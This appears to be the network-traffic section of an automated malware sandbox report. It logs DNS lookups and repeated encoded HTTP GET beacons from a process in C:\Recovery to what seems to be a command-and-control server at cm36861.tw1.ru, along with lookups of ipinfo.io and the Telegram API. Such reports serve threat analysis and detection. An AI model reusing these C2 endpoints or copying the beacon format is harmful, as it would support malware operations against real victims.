Oct 24, 2024 13:59:07.525536060 CEST	80	49998	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:07.601687908 CEST	49998	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:12.539515018 CEST	49998	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:12.540905952 CEST	49999	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:12.545469999 CEST	80	49998	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:12.546305895 CEST	80	49999	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:12.546411037 CEST	49998	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:12.546413898 CEST	49999	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:12.546520948 CEST	49999	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:12.551923990 CEST	80	49999	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:12.552495956 CEST	80	49999	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:13.443510056 CEST	80	49999	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:13.492311954 CEST	49999	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:18.445888042 CEST	49999	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:18.446515083 CEST	50000	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:18.451947927 CEST	80	49999	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:18.451991081 CEST	80	50000	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:18.452019930 CEST	49999	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:18.452071905 CEST	50000	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:18.452212095 CEST	50000	80	192.168.2.5	92.53.106.114
Oct 24, 2024 13:59:18.457545996 CEST	80	50000	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:18.457705021 CEST	80	50000	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:19.345777988 CEST	80	50000	92.53.106.114	192.168.2.5
Oct 24, 2024 13:59:19.492407084 CEST	50000	80	192.168.2.5	92.53.106.114

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 13:57:08.070024014 CEST	58786	53	192.168.2.5	1.1.1.1
Oct 24, 2024 13:57:08.125955105 CEST	53	58786	1.1.1.1	192.168.2.5
Oct 24, 2024 13:57:10.237564087 CEST	49158	53	192.168.2.5	1.1.1.1
Oct 24, 2024 13:57:10.245516062 CEST	53	49158	1.1.1.1	192.168.2.5
Oct 24, 2024 13:57:12.131495953 CEST	59450	53	192.168.2.5	1.1.1.1
Oct 24, 2024 13:57:12.139215946 CEST	53	59450	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 24, 2024 13:57:08.070024014 CEST	192.168.2.5	1.1.1.1	0xe5d	Standard query (0)	cm36861.tw1.ru	A (IP address)	IN (0x0001)	false
Oct 24, 2024 13:57:10.237564087 CEST	192.168.2.5	1.1.1.1	0xc5b	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Oct 24, 2024 13:57:12.131495953 CEST	192.168.2.5	1.1.1.1	0xd3fb	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 24, 2024 13:57:08.125955105 CEST	1.1.1.1	192.168.2.5	0xe5d	No error (0)	cm36861.tw1.ru	92.53.106.114	A (IP address)	IN (0x0001)	false
Oct 24, 2024 13:57:10.245516062 CEST	1.1.1.1	192.168.2.5	0xc5b	No error (0)	ipinfo.io	34.117.59.81	A (IP address)	IN (0x0001)	false
Oct 24, 2024 13:57:12.139215946 CEST	1.1.1.1	192.168.2.5	0xd3fb	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

api.telegram.org

cm36861.tw1.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:57:08.159954071 CEST	512	OUT	GET /2b750b3c.php?Htuc=04FW5e1D7gwHOLZmIUeH86Hd8X1BJW&6Y=n1I1G72yRqMJwlPc9ZQ&3b482a1504ac77c5c43f7e15a2187b43=9f54798b89eb404995a9b7978336a5b8&c3f24358aa290547facbfb1d35d51e12=gN5QDZjZzMmJGZ0Y2NjFTZihjMxcTYmNTNkRDO4IWZlRGOwE2YyIDO&Htuc=04FW5e1D7gwHOLZmIUeH86Hd8X1BJW&6Y=n1I1G72yRqMJwlPc9ZQ HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru Connection: Keep-Alive
Oct 24, 2024 13:57:09.154788017 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:57:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2148 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3d 30 6e 49 7a 55 54 59 35 55 54 4d 78 51 32 59 6a 46 7a 4d 78 41 7a 4e 34 4d 32 59 7a 45 6d 5a 35 55 44 4e 78 49 54 5a 79 51 57 4d 79 55 6a 49 36 49 53 4e 32 51 7a 59 30 63 6a 4e 6b 68 7a 4e 6b 52 47 4f 6c 6c 6a 4d 34 45 7a 4e 69 5a 6d 5a 78 4d 6d 4e 32 6b 44 4e 6c 4a 32 4d 31 49 43 4c 69 59 57 55 76 64 33 54 70 70 55 65 61 68 6c 55 35 70 46 57 61 56 6e 59 77 34 55 4e 5a 4a 54 4e 73 4e 6d 62 4b 46 54 57 78 6b 54 64 68 64 46 5a 78 49 47 53 43 5a 6e 57 58 4e 57 61 4a 4e 55 51 4c 78 30 51 4a 74 57 53 71 39 57 61 50 56 6b 57 56 5a 6c 56 35 4d 6e 59 79 6f 45 64 6c 5a 6c 54 31 6b 6c 4d 31 77 32 59 75 70 55 4d 5a 46 54 4f 31 46 32 56 6b 46 6a 59 49 4a 6b 64 61 64 31 59 70 6c 30 51 42 74 45 54 44 6c 30 61 4a 70 32 62 70 4a 32 52 35 6b 6d 59 59 78 47 56 6c 64 6c 54 31 70 46 57 4b 6c 48 5a 58 35 6b 5a 69 31 47 62 75 52 32 56 34 64 6e 59 79 59 6c 62 4a 6c 57 51 6e 4e 55 61 33 6c 6d 55 47 35 6b 56 4a 70 32 62 70 70 31 56 53 5a 58 55 7a 77 6d 61 69 31 6d 56 35 4e 6d 62 57 70 47 57 79 55 44 63 61 4e 6a 56 7a 4e [TRUNCATED] Data Ascii: =0nIzUTY5UTMxQ2YjFzMxAzN4M2YzEmZ5UDNxITZyQWMyUjI6ISN2QzY0cjNkhzNkRGOlljM4EzNiZmZxMmN2kDNlJ2M1ICLiYWUvd3TppUeahlU5pFWaVnYw4UNZJTNsNmbKFTWxkTdhdFZxIGSCZnWXNWaJNUQLx0QJtWSq9WaPVkWVZlV5MnYyoEdlZlT1klM1w2YupUMZFTO1F2VkFjYIJkdad1Ypl0QBtETDl0aJp2bpJ2R5kmYYxGVldlT1pFWKlHZX5kZi1GbuR2V4dnYyYlbJlWQnNUa3lmUG5kVJp2bpp1VSZXUzwmai1mV5NmbWpGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUb54WWX5EchVUT2h1RGpWYYpEbiVVRp9UaKxmYtljNadVMwRmR5UXYXRWMihkQ2p1VjlWSDF0SMNUS31UaJZTSu5UMhdlUoVlbspWWYpUMZJjTCJWb5AHZHZkaiJDemJWbs5GZXh3diJjVulUaBd2QpdXaOpWQw80Q0MzTTBTaPlmSspFSWBTYXRWdiJDemJWbs5GZXh3diJjVulUaBd2QpdXaORVW310Q0gXT5lkNJ1mVrRGWSBHZHZ0cYJTNwp1MWN3YHlDbalXSnlUQvNXStZkahhlSsJWVFdWYIJVeiBDNp9UaKxmYXZ0TkdUNsJWbsBjYtljaYJTNwp1MWN3YHlDbalXSnlUQvNXSrZ0TJp2bpp1VSZXUzIVdadVNwR2R1YXWxkTdhdFZxIGSCZnWXNWaJNUQLx0RWpnYHZUbPlmSsR2RGlnVFZ0VkdlVmJWbs5GZXh3diJjVulUaBd2Qpd3dPlmSWJ1V1AHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkbOxGZHZEMVlnQrpFWSBnYsVVaPlmSsJ2VG9UZYpEMi5mV2lVM5UXYXRWMihkQ2p1VjlWSDF0SMNkSUZ1UJZTStZ1aiBjT1MmbSVHZXljaYJTNwp1MWN3YHlDbalXSnlUQvNXSqVVeOlWS2kUb [TRUNCATED]
Oct 24, 2024 13:57:09.154881001 CEST	212	IN	Data Raw: 64 58 61 4a 70 32 62 70 70 31 56 53 5a 58 55 79 59 45 62 6a 31 6d 52 6d 4a 57 62 73 35 47 5a 58 68 33 64 69 4a 6a 56 75 6c 55 61 42 64 32 51 70 64 58 61 6a 4a 6a 52 30 6f 6c 56 52 6c 32 54 70 70 45 62 69 64 6c 52 50 4a 57 62 35 41 6e 57 79 59 56 Data Ascii: dXaJp2bpp1VSZXUyYEbj1mRmJWbs5GZXh3diJjVulUaBd2QpdXajJjR0olVRl2TppEbidlRPJWb5AnWyYVeYJTNwp1MWN3YHlDbalXSnlUQvNXSshWVJp2bpp1VSZXUyUjdhdFZsNGb5UXYXRWMihkQ2p1VjlWSDF0SMNkS6lFWoxmVDlkNJ1WN2F2Vkx2YslTdhdFZxIGSCZnWXNWaJ
Oct 24, 2024 13:57:09.154892921 CEST	887	IN	Data Raw: 4e 55 51 4c 78 30 51 4b 56 6e 57 58 5a 31 63 69 64 45 62 4d 6c 6b 61 76 6c 57 5a 59 4a 46 63 5a 46 54 4f 31 46 32 56 6b 46 6a 59 49 4a 6b 64 61 64 31 59 70 6c 30 51 42 74 45 54 44 6c 55 64 51 31 57 52 32 68 46 52 34 52 6e 59 79 30 55 64 61 64 55 Data Ascii: NUQLx0QKVnWXZ1cidEbMlkavlWZYJFcZFTO1F2VkFjYIJkdad1Ypl0QBtETDlUdQ1WR2hFR4RnYy0UdadUNwJGWohmYTVzMkNzY2h1Q5M2Tu50dkhkUvBVakRnYy0UdadUNwJGWohmYTVzMkNzY2h1Q5M2Tu50dkhkUvpkex0mWYp0bJdUR4k0RxY3Ytl1ZadFepl1V4BXWYpFaJNEerJWbs5UZHZkTJhEbpl0RSxGZHZEbj1WT
Oct 24, 2024 13:57:09.850696087 CEST	2133	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZ [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
Oct 24, 2024 13:57:10.128856897 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:57:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:57:09.860852957 CEST	758	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&4f95757b0d5ea400a0cf47cfe251d048=0VfiIiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI2IDZ0AzNwYGMklzMkNTMwYmMxcDO5E2Y4UmYmNDZ5gTOlFGN0MTM4IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:57:10.263870955 CEST	1273	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&c53e3657c2ea67a0f680c4bd0f941e0a=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI2IDZ0AzNwYGMklzMkNTMwYmMxcDO5E2Y4UmYmNDZ5gTOlFGN0MTM4IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJ [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
Oct 24, 2024 13:57:11.146716118 CEST	161	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:57:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Oct 24, 2024 13:57:11.360827923 CEST	161	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:57:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49710	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:57:15.142137051 CEST	2161	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1Vih [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru Connection: Keep-Alive
Oct 24, 2024 13:57:16.055401087 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:57:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49743	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:57:21.123254061 CEST	2137	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1Vih [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
Oct 24, 2024 13:57:22.008099079 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:57:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye
Oct 24, 2024 13:57:27.024133921 CEST	2137	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1Vih [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
Oct 24, 2024 13:57:27.299823046 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:57:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49803	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:57:32.313707113 CEST	2159	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1c